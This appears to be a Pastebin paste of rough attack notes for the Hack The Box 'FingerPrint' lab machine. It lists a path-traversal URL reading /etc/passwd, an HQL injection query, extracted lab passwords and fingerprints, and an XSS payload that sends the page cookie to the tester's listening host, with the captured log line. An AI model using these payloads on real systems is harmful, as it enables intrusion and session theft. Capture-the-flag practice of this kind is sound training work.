Mr_hEx

FingerPrint HTB (Working !!)

Dec 13th, 2021 (edited)
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. Found LFI : http://10.10.11.127/admin/view/../../etc/passwd
  2. Found password of login page on :80 => http://10.10.11.127/admin/view/../../home/flask/app/users.db
  3. Found HQL injection on login page :8080
  4. something intersting in http://10.10.11.127/admin/view/auth.log => loged of login page on :8080
  5. Query : test'+or+SUBSTR(username/password/fingerprint,1,1)='X
  6. fingerprint:
  7. 99cd639f9e163767115029a31acd97bfa19344b6202ac0b8bdd586e46f436666
  8. 7ef52c251f8044cb187013992891d0e58ce9194de7f535b1b4fa6bbfe08678f6
  9. password:
  10. lwG7guR1eMx7uNxSJXQz
  11. o9vb0kb9kuzj1dtxzlv8
  12. username:
  13. admin
  14. micheal1235
  15. Found something intersting on IP:8080/upload => dose not accept get request only post request !
  16. to do :
  17. try to upload file => IP:8080/upload maybe need to fuzz parameter
  18. I got cookie from XSS on auth.log with this paylaod : <script>var i=new Image;i.src="http://10.10.14.50:8000/?"+document.cookie;</script>
  19. 10.10.11.127 - - [15/Dec/2021 05:45:05] "GET /?user_id=49f5f0062780bed62dc06bf4a8d2dd9cb5c3fda50e19a5a840262c26c001bb0338550635d9fd36fef81113d9fbd15805193308e099ee214406b0a87c0b6587fb
  20.  
Add Comment
Please, Sign In to add comment